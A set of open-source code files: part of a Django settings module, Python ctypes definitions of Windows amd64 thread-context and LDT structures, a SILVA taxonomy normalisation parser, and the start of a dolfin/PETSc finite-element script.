# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'q34tJ/(oTzQ$34t&$/5ue6sFghS4%56uw5wgSDfghk78W%h24%z2$z3689089=P'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'seamless.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'seamless.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'haystack',
'south',
'api',
'web',
)
import os
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'xapian_backend.XapianEngine',
'PATH': os.path.join(os.path.dirname(__file__), 'xapian_index'),
},
}
# https://github.com/notanumber/xapian-haystack
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
Phaiax/openscad-seamlesslib-server
|
src/seamless/settings.py
|
Python
|
gpl-2.0
| 5,710
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2009-2014, Mario Vilas
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice,this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
CONTEXT structure for amd64.
"""
__revision__ = "$Id: context_amd64.py 1299 2013-12-20 09:30:55Z qvasimodo $"
from defines import *
from version import ARCH_AMD64
import context_i386
#==============================================================================
# This is used later on to calculate the list of exported symbols.
_all = None
_all = set(vars().keys())
#==============================================================================
#--- CONTEXT structures and constants -----------------------------------------
# The following values specify the type of access in the first parameter
# of the exception record when the exception code specifies an access
# violation.
EXCEPTION_READ_FAULT = 0 # exception caused by a read
EXCEPTION_WRITE_FAULT = 1 # exception caused by a write
EXCEPTION_EXECUTE_FAULT = 8 # exception caused by an instruction fetch
CONTEXT_AMD64 = 0x00100000
CONTEXT_CONTROL = (CONTEXT_AMD64 | 0x1L)
CONTEXT_INTEGER = (CONTEXT_AMD64 | 0x2L)
CONTEXT_SEGMENTS = (CONTEXT_AMD64 | 0x4L)
CONTEXT_FLOATING_POINT = (CONTEXT_AMD64 | 0x8L)
CONTEXT_DEBUG_REGISTERS = (CONTEXT_AMD64 | 0x10L)
CONTEXT_MMX_REGISTERS = CONTEXT_FLOATING_POINT
CONTEXT_FULL = (CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_FLOATING_POINT)
CONTEXT_ALL = (CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS | \
CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS)
CONTEXT_EXCEPTION_ACTIVE = 0x8000000
CONTEXT_SERVICE_ACTIVE = 0x10000000
CONTEXT_EXCEPTION_REQUEST = 0x40000000
CONTEXT_EXCEPTION_REPORTING = 0x80000000
INITIAL_MXCSR = 0x1f80 # initial MXCSR value
INITIAL_FPCSR = 0x027f # initial FPCSR value
# typedef struct _XMM_SAVE_AREA32 {
# WORD ControlWord;
# WORD StatusWord;
# BYTE TagWord;
# BYTE Reserved1;
# WORD ErrorOpcode;
# DWORD ErrorOffset;
# WORD ErrorSelector;
# WORD Reserved2;
# DWORD DataOffset;
# WORD DataSelector;
# WORD Reserved3;
# DWORD MxCsr;
# DWORD MxCsr_Mask;
# M128A FloatRegisters[8];
# M128A XmmRegisters[16];
# BYTE Reserved4[96];
# } XMM_SAVE_AREA32, *PXMM_SAVE_AREA32;
class XMM_SAVE_AREA32(Structure):
_pack_ = 1
_fields_ = [
('ControlWord', WORD),
('StatusWord', WORD),
('TagWord', BYTE),
('Reserved1', BYTE),
('ErrorOpcode', WORD),
('ErrorOffset', DWORD),
('ErrorSelector', WORD),
('Reserved2', WORD),
('DataOffset', DWORD),
('DataSelector', WORD),
('Reserved3', WORD),
('MxCsr', DWORD),
('MxCsr_Mask', DWORD),
('FloatRegisters', M128A * 8),
('XmmRegisters', M128A * 16),
('Reserved4', BYTE * 96),
]
def from_dict(self):
raise NotImplementedError()
def to_dict(self):
d = dict()
for name, type in self._fields_:
if name in ('FloatRegisters', 'XmmRegisters'):
d[name] = tuple([ (x.LowPart + (x.HighPart << 64)) for x in getattr(self, name) ])
elif name == 'Reserved4':
d[name] = tuple([ chr(x) for x in getattr(self, name) ])
else:
d[name] = getattr(self, name)
return d
LEGACY_SAVE_AREA_LENGTH = sizeof(XMM_SAVE_AREA32)
PXMM_SAVE_AREA32 = ctypes.POINTER(XMM_SAVE_AREA32)
LPXMM_SAVE_AREA32 = PXMM_SAVE_AREA32
# //
# // Context Frame
# //
# // This frame has a several purposes: 1) it is used as an argument to
# // NtContinue, 2) is is used to constuct a call frame for APC delivery,
# // and 3) it is used in the user level thread creation routines.
# //
# //
# // The flags field within this record controls the contents of a CONTEXT
# // record.
# //
# // If the context record is used as an input parameter, then for each
# // portion of the context record controlled by a flag whose value is
# // set, it is assumed that that portion of the context record contains
# // valid context. If the context record is being used to modify a threads
# // context, then only that portion of the threads context is modified.
# //
# // If the context record is used as an output parameter to capture the
# // context of a thread, then only those portions of the thread's context
# // corresponding to set flags will be returned.
# //
# // CONTEXT_CONTROL specifies SegSs, Rsp, SegCs, Rip, and EFlags.
# //
# // CONTEXT_INTEGER specifies Rax, Rcx, Rdx, Rbx, Rbp, Rsi, Rdi, and R8-R15.
# //
# // CONTEXT_SEGMENTS specifies SegDs, SegEs, SegFs, and SegGs.
# //
# // CONTEXT_DEBUG_REGISTERS specifies Dr0-Dr3 and Dr6-Dr7.
# //
# // CONTEXT_MMX_REGISTERS specifies the floating point and extended registers
# // Mm0/St0-Mm7/St7 and Xmm0-Xmm15).
# //
#
# typedef struct DECLSPEC_ALIGN(16) _CONTEXT {
#
# //
# // Register parameter home addresses.
# //
# // N.B. These fields are for convience - they could be used to extend the
# // context record in the future.
# //
#
# DWORD64 P1Home;
# DWORD64 P2Home;
# DWORD64 P3Home;
# DWORD64 P4Home;
# DWORD64 P5Home;
# DWORD64 P6Home;
#
# //
# // Control flags.
# //
#
# DWORD ContextFlags;
# DWORD MxCsr;
#
# //
# // Segment Registers and processor flags.
# //
#
# WORD SegCs;
# WORD SegDs;
# WORD SegEs;
# WORD SegFs;
# WORD SegGs;
# WORD SegSs;
# DWORD EFlags;
#
# //
# // Debug registers
# //
#
# DWORD64 Dr0;
# DWORD64 Dr1;
# DWORD64 Dr2;
# DWORD64 Dr3;
# DWORD64 Dr6;
# DWORD64 Dr7;
#
# //
# // Integer registers.
# //
#
# DWORD64 Rax;
# DWORD64 Rcx;
# DWORD64 Rdx;
# DWORD64 Rbx;
# DWORD64 Rsp;
# DWORD64 Rbp;
# DWORD64 Rsi;
# DWORD64 Rdi;
# DWORD64 R8;
# DWORD64 R9;
# DWORD64 R10;
# DWORD64 R11;
# DWORD64 R12;
# DWORD64 R13;
# DWORD64 R14;
# DWORD64 R15;
#
# //
# // Program counter.
# //
#
# DWORD64 Rip;
#
# //
# // Floating point state.
# //
#
# union {
# XMM_SAVE_AREA32 FltSave;
# struct {
# M128A Header[2];
# M128A Legacy[8];
# M128A Xmm0;
# M128A Xmm1;
# M128A Xmm2;
# M128A Xmm3;
# M128A Xmm4;
# M128A Xmm5;
# M128A Xmm6;
# M128A Xmm7;
# M128A Xmm8;
# M128A Xmm9;
# M128A Xmm10;
# M128A Xmm11;
# M128A Xmm12;
# M128A Xmm13;
# M128A Xmm14;
# M128A Xmm15;
# };
# };
#
# //
# // Vector registers.
# //
#
# M128A VectorRegister[26];
# DWORD64 VectorControl;
#
# //
# // Special debug control registers.
# //
#
# DWORD64 DebugControl;
# DWORD64 LastBranchToRip;
# DWORD64 LastBranchFromRip;
# DWORD64 LastExceptionToRip;
# DWORD64 LastExceptionFromRip;
# } CONTEXT, *PCONTEXT;
class _CONTEXT_FLTSAVE_STRUCT(Structure):
_fields_ = [
('Header', M128A * 2),
('Legacy', M128A * 8),
('Xmm0', M128A),
('Xmm1', M128A),
('Xmm2', M128A),
('Xmm3', M128A),
('Xmm4', M128A),
('Xmm5', M128A),
('Xmm6', M128A),
('Xmm7', M128A),
('Xmm8', M128A),
('Xmm9', M128A),
('Xmm10', M128A),
('Xmm11', M128A),
('Xmm12', M128A),
('Xmm13', M128A),
('Xmm14', M128A),
('Xmm15', M128A),
]
def from_dict(self):
raise NotImplementedError()
def to_dict(self):
d = dict()
for name, type in self._fields_:
if name in ('Header', 'Legacy'):
d[name] = tuple([ (x.Low + (x.High << 64)) for x in getattr(self, name) ])
else:
x = getattr(self, name)
d[name] = x.Low + (x.High << 64)
return d
class _CONTEXT_FLTSAVE_UNION(Union):
_fields_ = [
('flt', XMM_SAVE_AREA32),
('xmm', _CONTEXT_FLTSAVE_STRUCT),
]
def from_dict(self):
raise NotImplementedError()
def to_dict(self):
d = dict()
d['flt'] = self.flt.to_dict()
d['xmm'] = self.xmm.to_dict()
return d
class CONTEXT(Structure):
arch = ARCH_AMD64
_pack_ = 16
_fields_ = [
# Register parameter home addresses.
('P1Home', DWORD64),
('P2Home', DWORD64),
('P3Home', DWORD64),
('P4Home', DWORD64),
('P5Home', DWORD64),
('P6Home', DWORD64),
# Control flags.
('ContextFlags', DWORD),
('MxCsr', DWORD),
# Segment Registers and processor flags.
('SegCs', WORD),
('SegDs', WORD),
('SegEs', WORD),
('SegFs', WORD),
('SegGs', WORD),
('SegSs', WORD),
('EFlags', DWORD),
# Debug registers.
('Dr0', DWORD64),
('Dr1', DWORD64),
('Dr2', DWORD64),
('Dr3', DWORD64),
('Dr6', DWORD64),
('Dr7', DWORD64),
# Integer registers.
('Rax', DWORD64),
('Rcx', DWORD64),
('Rdx', DWORD64),
('Rbx', DWORD64),
('Rsp', DWORD64),
('Rbp', DWORD64),
('Rsi', DWORD64),
('Rdi', DWORD64),
('R8', DWORD64),
('R9', DWORD64),
('R10', DWORD64),
('R11', DWORD64),
('R12', DWORD64),
('R13', DWORD64),
('R14', DWORD64),
('R15', DWORD64),
# Program counter.
('Rip', DWORD64),
# Floating point state.
('FltSave', _CONTEXT_FLTSAVE_UNION),
# Vector registers.
('VectorRegister', M128A * 26),
('VectorControl', DWORD64),
# Special debug control registers.
('DebugControl', DWORD64),
('LastBranchToRip', DWORD64),
('LastBranchFromRip', DWORD64),
('LastExceptionToRip', DWORD64),
('LastExceptionFromRip', DWORD64),
]
_others = ('P1Home', 'P2Home', 'P3Home', 'P4Home', 'P5Home', 'P6Home', \
'MxCsr', 'VectorRegister', 'VectorControl')
_control = ('SegSs', 'Rsp', 'SegCs', 'Rip', 'EFlags')
_integer = ('Rax', 'Rcx', 'Rdx', 'Rbx', 'Rsp', 'Rbp', 'Rsi', 'Rdi', \
'R8', 'R9', 'R10', 'R11', 'R12', 'R13', 'R14', 'R15')
_segments = ('SegDs', 'SegEs', 'SegFs', 'SegGs')
_debug = ('Dr0', 'Dr1', 'Dr2', 'Dr3', 'Dr6', 'Dr7', \
'DebugControl', 'LastBranchToRip', 'LastBranchFromRip', \
'LastExceptionToRip', 'LastExceptionFromRip')
_mmx = ('Xmm0', 'Xmm1', 'Xmm2', 'Xmm3', 'Xmm4', 'Xmm5', 'Xmm6', 'Xmm7', \
'Xmm8', 'Xmm9', 'Xmm10', 'Xmm11', 'Xmm12', 'Xmm13', 'Xmm14', 'Xmm15')
# XXX TODO
# Convert VectorRegister and Xmm0-Xmm15 to pure Python types!
@classmethod
def from_dict(cls, ctx):
'Instance a new structure from a Python native type.'
ctx = Context(ctx)
s = cls()
ContextFlags = ctx['ContextFlags']
s.ContextFlags = ContextFlags
for key in cls._others:
if key != 'VectorRegister':
setattr(s, key, ctx[key])
else:
w = ctx[key]
v = (M128A * len(w))()
i = 0
for x in w:
y = M128A()
y.High = x >> 64
y.Low = x - (x >> 64)
v[i] = y
i += 1
setattr(s, key, v)
if (ContextFlags & CONTEXT_CONTROL) == CONTEXT_CONTROL:
for key in cls._control:
setattr(s, key, ctx[key])
if (ContextFlags & CONTEXT_INTEGER) == CONTEXT_INTEGER:
for key in cls._integer:
setattr(s, key, ctx[key])
if (ContextFlags & CONTEXT_SEGMENTS) == CONTEXT_SEGMENTS:
for key in cls._segments:
setattr(s, key, ctx[key])
if (ContextFlags & CONTEXT_DEBUG_REGISTERS) == CONTEXT_DEBUG_REGISTERS:
for key in cls._debug:
setattr(s, key, ctx[key])
if (ContextFlags & CONTEXT_MMX_REGISTERS) == CONTEXT_MMX_REGISTERS:
xmm = s.FltSave.xmm
for key in cls._mmx:
y = M128A()
y.High = x >> 64
y.Low = x - (x >> 64)
setattr(xmm, key, y)
return s
def to_dict(self):
'Convert a structure into a Python dictionary.'
ctx = Context()
ContextFlags = self.ContextFlags
ctx['ContextFlags'] = ContextFlags
for key in self._others:
if key != 'VectorRegister':
ctx[key] = getattr(self, key)
else:
ctx[key] = tuple([ (x.Low + (x.High << 64)) for x in getattr(self, key) ])
if (ContextFlags & CONTEXT_CONTROL) == CONTEXT_CONTROL:
for key in self._control:
ctx[key] = getattr(self, key)
if (ContextFlags & CONTEXT_INTEGER) == CONTEXT_INTEGER:
for key in self._integer:
ctx[key] = getattr(self, key)
if (ContextFlags & CONTEXT_SEGMENTS) == CONTEXT_SEGMENTS:
for key in self._segments:
ctx[key] = getattr(self, key)
if (ContextFlags & CONTEXT_DEBUG_REGISTERS) == CONTEXT_DEBUG_REGISTERS:
for key in self._debug:
ctx[key] = getattr(self, key)
if (ContextFlags & CONTEXT_MMX_REGISTERS) == CONTEXT_MMX_REGISTERS:
xmm = self.FltSave.xmm.to_dict()
for key in self._mmx:
ctx[key] = xmm.get(key)
return ctx
PCONTEXT = ctypes.POINTER(CONTEXT)
LPCONTEXT = PCONTEXT
class Context(dict):
"""
Register context dictionary for the amd64 architecture.
"""
arch = CONTEXT.arch
def __get_pc(self):
return self['Rip']
def __set_pc(self, value):
self['Rip'] = value
pc = property(__get_pc, __set_pc)
def __get_sp(self):
return self['Rsp']
def __set_sp(self, value):
self['Rsp'] = value
sp = property(__get_sp, __set_sp)
def __get_fp(self):
return self['Rbp']
def __set_fp(self, value):
self['Rbp'] = value
fp = property(__get_fp, __set_fp)
#--- LDT_ENTRY structure ------------------------------------------------------
# typedef struct _LDT_ENTRY {
# WORD LimitLow;
# WORD BaseLow;
# union {
# struct {
# BYTE BaseMid;
# BYTE Flags1;
# BYTE Flags2;
# BYTE BaseHi;
# } Bytes;
# struct {
# DWORD BaseMid :8;
# DWORD Type :5;
# DWORD Dpl :2;
# DWORD Pres :1;
# DWORD LimitHi :4;
# DWORD Sys :1;
# DWORD Reserved_0 :1;
# DWORD Default_Big :1;
# DWORD Granularity :1;
# DWORD BaseHi :8;
# } Bits;
# } HighWord;
# } LDT_ENTRY,
# *PLDT_ENTRY;
class _LDT_ENTRY_BYTES_(Structure):
_pack_ = 1
_fields_ = [
('BaseMid', BYTE),
('Flags1', BYTE),
('Flags2', BYTE),
('BaseHi', BYTE),
]
class _LDT_ENTRY_BITS_(Structure):
_pack_ = 1
_fields_ = [
('BaseMid', DWORD, 8),
('Type', DWORD, 5),
('Dpl', DWORD, 2),
('Pres', DWORD, 1),
('LimitHi', DWORD, 4),
('Sys', DWORD, 1),
('Reserved_0', DWORD, 1),
('Default_Big', DWORD, 1),
('Granularity', DWORD, 1),
('BaseHi', DWORD, 8),
]
class _LDT_ENTRY_HIGHWORD_(Union):
_pack_ = 1
_fields_ = [
('Bytes', _LDT_ENTRY_BYTES_),
('Bits', _LDT_ENTRY_BITS_),
]
class LDT_ENTRY(Structure):
_pack_ = 1
_fields_ = [
('LimitLow', WORD),
('BaseLow', WORD),
('HighWord', _LDT_ENTRY_HIGHWORD_),
]
PLDT_ENTRY = POINTER(LDT_ENTRY)
LPLDT_ENTRY = PLDT_ENTRY
#--- WOW64 CONTEXT structure and constants ------------------------------------
# Value of SegCs in a Wow64 thread when running in 32 bits mode
WOW64_CS32 = 0x23
WOW64_CONTEXT_i386 = 0x00010000L
WOW64_CONTEXT_i486 = 0x00010000L
WOW64_CONTEXT_CONTROL = (WOW64_CONTEXT_i386 | 0x00000001L)
WOW64_CONTEXT_INTEGER = (WOW64_CONTEXT_i386 | 0x00000002L)
WOW64_CONTEXT_SEGMENTS = (WOW64_CONTEXT_i386 | 0x00000004L)
WOW64_CONTEXT_FLOATING_POINT = (WOW64_CONTEXT_i386 | 0x00000008L)
WOW64_CONTEXT_DEBUG_REGISTERS = (WOW64_CONTEXT_i386 | 0x00000010L)
WOW64_CONTEXT_EXTENDED_REGISTERS = (WOW64_CONTEXT_i386 | 0x00000020L)
WOW64_CONTEXT_FULL = (WOW64_CONTEXT_CONTROL | WOW64_CONTEXT_INTEGER | WOW64_CONTEXT_SEGMENTS)
WOW64_CONTEXT_ALL = (WOW64_CONTEXT_CONTROL | WOW64_CONTEXT_INTEGER | WOW64_CONTEXT_SEGMENTS | WOW64_CONTEXT_FLOATING_POINT | WOW64_CONTEXT_DEBUG_REGISTERS | WOW64_CONTEXT_EXTENDED_REGISTERS)
WOW64_SIZE_OF_80387_REGISTERS = 80
WOW64_MAXIMUM_SUPPORTED_EXTENSION = 512
class WOW64_FLOATING_SAVE_AREA (context_i386.FLOATING_SAVE_AREA):
pass
class WOW64_CONTEXT (context_i386.CONTEXT):
pass
class WOW64_LDT_ENTRY (context_i386.LDT_ENTRY):
pass
PWOW64_FLOATING_SAVE_AREA = POINTER(WOW64_FLOATING_SAVE_AREA)
PWOW64_CONTEXT = POINTER(WOW64_CONTEXT)
PWOW64_LDT_ENTRY = POINTER(WOW64_LDT_ENTRY)
#==============================================================================
# This calculates the list of exported symbols.
_all = set(vars().keys()).difference(_all)
__all__ = [_x for _x in _all if not _x.startswith('_')]
__all__.sort()
#==============================================================================
|
icchy/tracecorn
|
unitracer/lib/windows/amd64/context_amd64.py
|
Python
|
mit
| 21,234
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###################################################################################################
# Previous silva handling code that served as a basis for this code was written by JAR and
# Jessica Grant as a part of the reference_taxonomy and OToL efforts.
from __future__ import print_function
import io
import os
import logging
from peyutil import (assure_dir_exists,
read_as_json,
write_as_json)
from taxalotl.commands import unpack_resources
from taxalotl.ott_schema import InterimTaxonomyData
from taxalotl.cmds.partitions import GEN_MAPPING_FILENAME
from taxalotl.resource_wrapper import TaxonomyWrapper
from taxalotl.util import OutFile
_LOG = logging.getLogger(__name__)
def parse_silva_ids(fn):
preferred = set()
with io.open(fn, 'rU', encoding='utf-8') as inp:
for line in inp:
ls = line.strip()
if ls:
preferred.add(ls)
return preferred
# noinspection PyUnusedLocal
def normalize_silva_taxonomy(source, destination, res_wrapper):
assure_dir_exists(destination)
depends_on = res_wrapper.depends_on
taxalotl_config = res_wrapper.config
expect_id_fp, ncbi_mapping_res = None, None
for dep_id in depends_on:
dep_res = taxalotl_config.get_terminalized_res_by_id(dep_id, 'normalize silva')
if not dep_res.has_been_unpacked():
unpack_resources(taxalotl_config, [dep_id])
if dep_res.schema.lower() == 'id list':
dep_fp = os.path.join(dep_res.unpacked_filepath, dep_res.local_filename)
expect_id_fp = dep_fp
elif dep_res.schema.lower() in {'silva taxmap', "fasta silva taxmap"}:
dep_fp = dep_res.normalized_filepath
ncbi_mapping_res = dep_res
else:
raise ValueError('unrecognized dependency schema {}'.format(dep_res.schema))
if not os.path.isfile(dep_fp):
raise ValueError("Silva processing dependency not found at: {}".format(dep_fp))
if expect_id_fp is None:
raise ValueError('ID list dependency not found.')
if ncbi_mapping_res is None:
raise ValueError('NCBI mapping dependency not found.')
expect_tax_fp = os.path.join(res_wrapper.unpacked_filepath, res_wrapper.local_filename)
if not os.path.isfile(expect_tax_fp):
raise ValueError("Silva taxon file not found at: {}".format(expect_tax_fp))
acc_to_trim = ncbi_mapping_res.parse_acc_to_trim_from_ncbi()
preferred = parse_silva_ids(expect_id_fp)
itd = InterimTaxonomyData()
part_name_to_silva_id = parse_silva_taxon_file(expect_tax_fp, preferred, acc_to_trim, itd)
_LOG.info('{} taxonomy IDs read'.format(len(itd.to_par)))
res_wrapper.post_process_interim_tax_data(itd)
itd.write_to_dir(destination)
mapping_file = os.path.join(destination, GEN_MAPPING_FILENAME)
with OutFile(mapping_file) as outs:
write_as_json(part_name_to_silva_id, outs, indent=2)
def gen_all_namepaths(path, name, prim_acc):
an = []
while path.endswith(';'):
path = path[:-1]
if name:
if '(' in name:
name = name.split('(')[0].strip()
an.append(((path, name), prim_acc))
ps = path.split(';')
prev = ''
for n, el in enumerate(ps):
if not el:
continue
one_based = 1 + n
np = (prev, el)
prop_id = '{}/#{}'.format(prim_acc, one_based)
an.append((np, prop_id))
if prev:
prev = '{};{}'.format(prev, el)
else:
prev = el
return an
def parse_silva_taxon_file(expect_tax_fp, preferred_ids, acc_to_trim, itd):
fung_pref = 'Eukaryota;Opisthokonta;Nucletmycea;Fungi;'
animal_pref = 'Eukaryota;Opisthokonta;Holozoa;Metazoa (Animalia);'
pl_pref = 'Eukaryota;Archaeplastida;Chloroplastida;Charophyta;Phragmoplastophyta;Streptophyta;'
mito_pref = 'Bacteria;Proteobacteria;Alphaproteobacteria;Rickettsiales;Mitochondria;'
chloro_pref = 'Bacteria;Cyanobacteria;Chloroplast;'
trim_pref = (fung_pref, animal_pref, pl_pref, mito_pref, chloro_pref)
namepath_to_id_pair = {}
with io.open(expect_tax_fp, 'rU', encoding='utf-8') as inp:
eh = 'primaryAccession\tstart\tstop\tpath\torganism_name\ttaxid\n'
iinp = iter(inp)
h = next(iinp)
if h != eh:
raise ValueError("Unexpected header: {}".format(h))
for n, line in enumerate(iinp):
ls = line.strip()
if not ls:
continue
prim_acc, start, stop, path, name, tax_id = ls.split('\t')
if n % 10000 == 0:
_LOG.info("read taxon {} '{}' ...".format(n, name))
if prim_acc in acc_to_trim:
tpath = None
for p in trim_pref:
if path.startswith(p):
tpath = p
break
if tpath is None:
_LOG.info('deleting to untrimmable {}'.format(prim_acc))
continue
else:
all_names = gen_all_namepaths(path, '', prim_acc)
else:
all_names = gen_all_namepaths(path, name, prim_acc)
for np in all_names:
# _LOG.info('np = {}'.format(np))
assert not np[0][0].endswith(';')
name_path, proposed_id = np
stored = namepath_to_id_pair.setdefault(name_path, [None, None])
if stored[0] is None:
if proposed_id in preferred_ids:
stored[0], stored[1] = proposed_id, proposed_id
elif stored[1] is None or proposed_id < stored[1]:
stored[1] = proposed_id
for pid in namepath_to_id_pair.values():
if pid[0] is None:
pid[0] = pid[1]
part_map_to_namepath = {
'Archaeplastida': ('Eukaryota', 'Archaeplastida'),
'Chloroplastida': ('Eukaryota;Archaeplastida', 'Chloroplastida'),
'Glaucophyta': ('Eukaryota;Archaeplastida', 'Glaucophyta'),
'Rhodophyta': ('Eukaryota;Archaeplastida', 'Rhodophyceae'),
'Haptophyta': ('Eukaryota', 'Haptophyta'),
'Eukaryota': ('', 'Eukaryota'),
'Archaea': ('', 'Archaea'),
'Bacteria': ('', 'Bacteria'),
'SAR': ('Eukaryota', 'SAR'),
}
part_name_to_silva_id = {}
for part_name, path_name in part_map_to_namepath.items():
part_name_to_silva_id[part_name] = [namepath_to_id_pair[path_name][0]]
to_par = itd.to_par
to_children = itd.to_children
to_name = itd.to_name
npk = list(namepath_to_id_pair.keys())
npk.sort()
to_par["0"] = None
to_children["0"] = []
to_name["0"] = "Life"
itd.root_nodes.add("0")
for name_path in npk:
silva_id = namepath_to_id_pair[name_path][0]
par_name = name_path[0]
if par_name:
if ';' in par_name:
pnpl = par_name.split(';')
pn = pnpl[-1]
anc_part = ';'.join(pnpl[:-1])
pnp = (anc_part, pn)
else:
pnp = ('', par_name)
par_silva_id = namepath_to_id_pair[pnp][0]
else:
par_silva_id = "0"
if silva_id in to_par:
m = '{} remains mapped to ({}, {}) rather than ({}, {})'
_LOG.warning(
m.format(silva_id, to_par[silva_id], to_name[silva_id], par_silva_id, name_path[1]))
else:
to_par[silva_id] = par_silva_id
to_children.setdefault(par_silva_id, []).append(silva_id)
to_name[silva_id] = name_path[1]
_LOG.info('{} SILVA ids stored'.format(len(to_name)))
return part_name_to_silva_id
# noinspection PyAbstractClass
class SilvaIdListWrapper(TaxonomyWrapper):
resource_type = 'id list'
schema = {'id list'}
# noinspection PyAbstractClass
class SilvaToNCBIMappingListWrapper(TaxonomyWrapper):
resource_type = "id to ncbi mapping"
schema = {"id to ncbi mapping", "silva taxmap", "fasta silva taxmap"}
_norm_filename = 'ncbi_taxmap.tsv'
def __init__(self, obj, parent=None, refs=None):
TaxonomyWrapper.__init__(self, obj, parent=parent, refs=refs)
def parse_acc_to_trim_from_ncbi(self):
trimmed_pref = {'root;cellular organisms;Eukaryota;Opisthokonta;Fungi;',
'root;cellular organisms;Eukaryota;Opisthokonta;Metazoa;',
'root;cellular organisms;Eukaryota;Viridiplantae;',
'Eukaryota;Archaeplastida;Chloroplastida;',
'Eukaryota;Opisthokonta;Holozoa;Metazoa;',
'Eukaryota;Opisthokonta;Nucletmycea;Fungi;',
}
to_trim = set()
with io.open(self.normalized_filepath, 'rU', encoding='utf-8') as inp:
for n, line in enumerate(inp):
ls = line.strip()
if not ls:
continue
prim_acc, start, stop, path, name = ls.split('\t')
if n % 10000 == 0:
_LOG.info("scanned taxon {} '{}' ...".format(n, name))
for pref in trimmed_pref:
if path.startswith(pref):
to_trim.add(prim_acc)
break
return to_trim
class SilvaWrapper(TaxonomyWrapper):
resource_type = 'id list'
schema = {"silva taxmap"}
def __init__(self, obj, parent=None, refs=None):
TaxonomyWrapper.__init__(self, obj, parent=parent, refs=refs)
def normalize(self):
normalize_silva_taxonomy(self.unpacked_filepath, self.normalized_filedir, self)
def get_primary_partition_map(self):
return read_as_json(os.path.join(self.normalized_filedir, GEN_MAPPING_FILENAME))
|
mtholder/taxalotl
|
taxalotl/parsing/silva.py
|
Python
|
bsd-2-clause
| 9,865
|
from dolfin import *
import petsc4py
import sys
petsc4py.init(sys.argv)
from petsc4py import PETSc
import CheckPetsc4py as CP
import splitCG as cg
n = 2**4
mesh = UnitSquareMesh(n,n)
V = FunctionSpace(mesh,"CG",1)
u = TestFunction(V)
v = TrialFunction(V)
A = assemble(inner(grad(u),grad(v))*dx)
M = assemble(inner(u,v)*dx)
AM = assemble(inner(grad(u),grad(v))*dx+inner(u,v)*dx)
AM = CP.Assemble(AM)
A = CP.Assemble(A)
M = CP.Assemble(M)
u, b = AM.getVecs()
b.set(1)
b = AM*b
u.set(0)
ksp = PETSc.KSP()
ksp.create(comm=PETSc.COMM_WORLD)
